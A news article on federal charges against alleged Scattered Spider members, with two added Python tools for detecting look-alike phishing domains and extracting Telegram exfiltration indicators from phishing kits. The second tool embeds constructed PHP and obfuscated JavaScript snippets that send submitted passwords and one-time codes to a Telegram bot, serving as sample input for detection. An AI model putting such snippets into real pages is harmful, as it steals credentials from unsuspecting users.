Feds Charge Five Men in Scattered Spider Roundup: Krebs on Security

Federal prosecutors in Los Angeles have unveiled criminal charges against five individuals suspected of being part of a hacking group that carried out numerous cyber intrusions at prominent U.S. technology companies from 2021 to 2023. The companies affected by these cyberattacks include LastPass, MailChimp, Okta, T-Mobile, and Twilio.

The five men, aged 20 to 25, are alleged to be members of a hacking conspiracy tracked as “Scattered Spider” and “0ktapus.” Their method was SMS-based phishing: text messages that lured employees at tech companies into entering their credentials and one-time passcodes on phishing websites.

The messages typically told the employee to click a link and sign in to a website that mimicked their employer’s Okta authentication page. Some claimed the employee’s VPN credentials were about to expire and had to be renewed; others announced a change to their work schedule.

The group used newly registered domains that often incorporated the targeted company’s name, such as twilio-help[.]com and ouryahoo-okta[.]com. The phishing sites were short-lived, usually online for only an hour or two, which left anti-phishing and security services little time to flag them.
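The naming pattern above (a protected brand or its identity provider, joined to a lure word, on a domain registered hours or days earlier) is mechanical enough to score automatically. The following is an added example, not code from the original article or from any vendor: it scores candidate domains on brand presence (including one-character typos such as “twillio”), lure words, and registration age. The brand list, allowlist, candidate domains and registration dates are constructed for illustration; in practice the candidates would come from a certificate transparency or passive-DNS feed and the dates from WHOIS/RDAP.

```python
"""Flag newly registered domains that impersonate a target company or its
identity provider. Added example; brand list, allowlist, sample domains
and dates are constructed, not taken from the article."""
from datetime import date
import re

BRANDS = {"twilio", "okta", "mailchimp", "lastpass", "yahoo"}   # names worth protecting
LURES = {"help", "sso", "vpn", "login", "support", "schedule", "hr", "verify"}
ALLOWLIST = {"twilio.com", "okta.com", "mailchimp.com", "lastpass.com", "yahoo.com"}

def registrable(domain):
    """'sso.twilio-help.com' -> 'twilio-help.com' (assumes a one-label public suffix)."""
    parts = domain.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])

def tokens(label):
    """Split 'ouryahoo-okta' on hyphens and digits -> ['ouryahoo', 'okta']."""
    return [t for t in re.split(r"[-0-9]+", label) if t]

def edit_distance(a, b):
    """Classic Levenshtein distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def brand_hits(label):
    """Brands embedded in the label ('ouryahoo' -> yahoo) or one typo away ('twillio')."""
    hits = {b for b in BRANDS if b in label}
    for tok in tokens(label):
        if len(tok) >= 5:  # short tokens produce too many accidental near-misses
            hits.update(b for b in BRANDS if edit_distance(tok, b) == 1)
    return hits

def assess(domain, registered, today, max_age_days=7):
    """Return (verdict, reasons); verdict is 'allow', 'review' or 'block'."""
    reg = registrable(domain)
    label = reg.split(".")[0]
    brands = brand_hits(label)
    lures = {t for t in tokens(label) if t in LURES}
    age_days = (today - registered).days
    reasons = []
    if brands:
        reasons.append("brand:" + ",".join(sorted(brands)))
    if lures:
        reasons.append("lure:" + ",".join(sorted(lures)))
    if age_days <= max_age_days:
        reasons.append(f"registered {age_days}d ago")
    if reg in ALLOWLIST:
        return "allow", reasons
    # A brand alone warrants a look; brand plus a lure word, a second brand,
    # or a fresh registration is the combination this campaign relied on.
    if brands and (lures or len(brands) > 1 or age_days <= max_age_days):
        return "block", reasons
    if brands:
        return "review", reasons
    return "allow", reasons

# Constructed candidates; the first three mirror the naming pattern in the text.
SAMPLE = [
    ("twilio-help.com", date(2022, 7, 30)),
    ("ouryahoo-okta.com", date(2022, 8, 1)),
    ("sso.twillio-vpn.net", date(2022, 7, 29)),
    ("okta.com", date(2009, 1, 1)),
    ("lastpass-news.org", date(2015, 3, 3)),
    ("weatherblog.org", date(2022, 7, 31)),
]
TODAY = date(2022, 8, 2)  # constructed "now"

def scan(entries=SAMPLE, today=TODAY):
    return {d: assess(d, r, today) for d, r in entries}

if __name__ == "__main__":
    for d, (verdict, why) in scan().items():
        print(f"{verdict:6} {d:24} {'; '.join(why)}")
```

Because the sites lived for an hour or two, this kind of scoring only helps if it runs on the domain feed as registrations and certificates appear, not on a daily batch; the `review` verdict exists so that a brand hit on an old, lure-free domain goes to an analyst rather than to an automatic block.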

The phishing kits used in these campaigns also contained a hidden Telegram bot that forwarded submitted credentials to the attackers in real time. That let them log in as the targeted employee on the genuine employer site before the one-time passcode expired.
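When a kit like this is recovered from a phishing host, the first triage question is where the stolen credentials went. The following is an added example, not code from the original article and not from any phishing kit: it extracts Telegram Bot API indicators (bot token, method, chat_id) from kit source, including URLs hidden behind base64_decode()/atob(). The PHP and JavaScript snippets are constructed for illustration; the token regex follows the documented “bot id:secret” shape of Telegram bot tokens, and api.telegram.org is the real Bot API host.

```python
"""Extract Telegram Bot API exfiltration indicators from recovered phishing
kit source. Added example; the PHP/JS samples are constructed."""
import base64
import re

TOKEN_RE = re.compile(r"(?<!\d)(\d{6,12}):([A-Za-z0-9_-]{30,})")   # <bot id>:<secret>
METHOD_RE = re.compile(r"/(sendMessage|sendDocument|sendPhoto)\b")
CHAT_ID_RE = re.compile(r"chat_id['\"]?\s*(?:=>|[=:])\s*['\"]?(-?\d{5,})")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
TELEGRAM_HOST = "api.telegram.org"

def decoded_layers(text, max_depth=2):
    """Return the text plus every base64 string in it that decodes to UTF-8
    text, recursively up to max_depth, so a hidden URL is scanned as well."""
    layers, frontier = {text}, [text]
    for _ in range(max_depth):
        nxt = []
        for chunk in frontier:
            for m in B64_RE.finditer(chunk):
                try:
                    dec = base64.b64decode(m.group(0), validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not base64 after all, or binary payload: skip
                if dec not in layers:
                    layers.add(dec)
                    nxt.append(dec)
        frontier = nxt
    return layers

def extract_exfil(source):
    """Summarise the Telegram exfil channel found in kit source, if any."""
    report = {"telegram_api": False, "bot_ids": set(), "secrets": set(),
              "methods": set(), "chat_ids": set()}
    for layer in decoded_layers(source):
        if TELEGRAM_HOST in layer:
            report["telegram_api"] = True
        for bot_id, secret in TOKEN_RE.findall(layer):
            report["bot_ids"].add(bot_id)
            report["secrets"].add(secret)   # evidence: handle like a credential
        report["methods"].update(METHOD_RE.findall(layer))
        report["chat_ids"].update(CHAT_ID_RE.findall(layer))
    return report

# Constructed PHP: token and chat id in variables, URL built by interpolation,
# so the full "bot<token>" URL never appears literally in the source.
SAMPLE_PLAIN = '''<?php
$token = "123456789:AAHxAbCdEfGhIjKlMnOpQrStUvWxYz012345";
$chat_id = "987654321";
$text = "User: " . $_POST["user"] . " Pass: " . $_POST["pass"] . " OTP: " . $_POST["otp"];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($text));
'''

# Constructed JavaScript: exfil URL hidden behind atob(). The base64 is built
# here so the sample stays readable; a real kit would ship it pre-encoded.
_HIDDEN_URL = "https://api.telegram.org/bot555000111:AAGQwErTyUiOpAsDfGhJkLzXcVbNm0123456789/sendDocument"
SAMPLE_OBFUSCATED = (
    'const u = atob("' + base64.b64encode(_HIDDEN_URL.encode()).decode() + '");\n'
    'fetch(u, {method: "POST", body: JSON.stringify({chat_id: "-100200300400", document: dump})});\n'
)

if __name__ == "__main__":
    for name, src in (("plain", SAMPLE_PLAIN), ("obfuscated", SAMPLE_OBFUSCATED)):
        r = extract_exfil(src)
        print(name, r["telegram_api"], sorted(r["bot_ids"]), sorted(r["methods"]), sorted(r["chat_ids"]))
```

The token is what ties a kit to its operator, which is why the recovered bot token and chat_id are the indicators to preserve and share; the secret itself should be treated as sensitive evidence rather than pasted into tickets, and any interaction with the live bot belongs to the investigators with the legal authority to do it.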

In August 2022, several security firms gained access to the server receiving data from the Telegram bot, which exposed the Telegram ID and handle of its developer, “Joeleoli.” Prosecutors identify Joeleoli as Joel Martin Evans, 25, of Jacksonville, North Carolina.

The group’s first major target in 2022 was Twilio, which provides text messaging and voice services. The hackers then used that access to go after at least 163 of Twilio’s customers, chiefly to steal cryptocurrency from the companies and their employees.

According to the FBI, Tyler Buchanan carried out numerous SIM-swapping attacks and amassed a large amount of cryptocurrency; at one point he reportedly held Bitcoin worth $27 million. Rival SIM-swappers staged a home invasion against Buchanan in 2023, after which he fled the UK.

Prosecutors also identified Noah Michael Urban, who used the aliases “Sosa,” “Elijah,” and “Kingbob,” as a key member of the group. Urban was arrested in Florida over multiple SIM-swapping attacks on individuals in the music industry.

Ahmed Hossam Eldin Elbadawy and Evans Onyeaka Osiebo, both of Texas, were also named in the indictment; Elbadawy allegedly controlled the cryptocurrency accounts used to receive stolen funds. The group is also believed to be behind the September 2023 ransomware attack on MGM Resorts, which disrupted operations across multiple MGM casinos.

The defendants face charges including conspiracy to commit wire fraud, conspiracy, aggravated identity theft, and wire fraud, which carry lengthy prison sentences on conviction.

The case illustrates how far low-tech SMS phishing against employees of major technology companies can reach, and how cooperation between law enforcement and private security firms, whose access to the kit’s back end surfaced the developer’s identity, leads to identification and prosecution.
